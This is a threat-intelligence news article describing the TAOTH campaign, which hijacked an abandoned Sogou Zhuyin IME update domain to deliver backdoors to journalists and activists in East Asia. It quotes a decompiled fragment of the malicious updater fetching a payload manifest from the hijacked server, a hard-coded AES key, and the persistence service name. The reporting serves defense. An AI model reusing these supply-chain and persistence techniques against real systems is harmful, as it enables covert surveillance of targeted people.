In June 2025, a previously undocumented campaign leveraging end-of-support software began surfacing in telemetry data gathered across Eastern Asia. Dubbed TAOTH, the operation exploits an abandoned Chinese input method editor (IME), Sogou Zhuyin, to deliver multiple malware families.
Initial intelligence indicated that victims, primarily traditional Chinese users and dissidents, downloaded what appeared to be legitimate updates before their systems were compromised.
The unexpected revival of a discontinued IME update server enabled threat actors to hijack software distribution and covertly install backdoors, spy tools, and loaders without raising suspicion.
Trend Micro researchers identified a surge in malicious activity when the lapsed domain for Sogou Zhuyin, dormant since mid-2019, began serving a malicious installer as early as November 2024. The compromised updater, ZhuyinUp.exe, connects to a weaponized update configuration endpoint to retrieve the payload manifest.
Infected systems subsequently download one of four distinct malware families—TOSHIS, DESFY, GTELAM, or C6DOOR—each designed for reconnaissance, information theft, persistence, or remote access.
Over several months, hundreds of high-value individuals, including journalists, technology executives, and activists across Taiwan, Hong Kong, Japan, and overseas Taiwanese communities, fell victim to these silent intrusions.
Trend Micro analysts noted that the campaign’s sophistication lies not only in its use of an abandoned software supply chain but also in its multi-stage infection process.
By combining hijacked software updates with spear-phishing operations, the threat actors achieved broad distribution and selective targeting. Victims who clicked on a malicious link or opened a decoy document found their desktops compromised within hours.
Post-infection telemetry revealed additional reconnaissance activities, such as directory enumeration, environment fingerprinting, and secure tunnel creation via legitimate cloud services.
In one key discovery, Trend Micro researchers identified how ZhuyinUp.exe retrieves the malicious update configuration:-
sub_440110(L"https://srv-pc.sogouzhuyin.com/v1/upgrade/version", config_buffer);
wcscpy_s(Destination, 100, L"SOGOU_UPDATER");
sub_419620(Destination, (int)this, flags);This snippet demonstrates how the updater queries a remote server for the next payload.
.webp "New TAOTH Campaign Exploits End-of-Support Software to Distribute Malware and Collect Sensitive Data 3")
The configuration file returned contains URLs, MD5 hashes, and file sizes, enabling the attacker to verify and execute only their crafted binaries.
Infection Mechanism and Persistence
Once the malicious updater launches, the chosen payload—often TOSHIS—patches the entry point of a legitimate executable to inject shellcode.
The loader calculates API function hashes using an Adler-32 algorithm, then downloads and decrypts the final backdoor payload with a hard-coded AES key (qazxswedcvfrtgbn).
.webp "New TAOTH Campaign Exploits End-of-Support Software to Distribute Malware and Collect Sensitive Data 4")
In the case of C6DOOR, the Go-based backdoor supports HTTP and WebSocket communication and allows operators to execute shellcode, capture screenshots, and transfer files via SFTP.
To maintain persistence, the malware registers a service named “SOGOU_UPDATER” under the LocalSystem account, ensuring that the compromised IME re-invokes the update routine on each system start.
By abusing native Windows update mechanisms and embedding itself in trusted processes, TAOTH remains highly stealthy, evading most traditional endpoint defenses.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
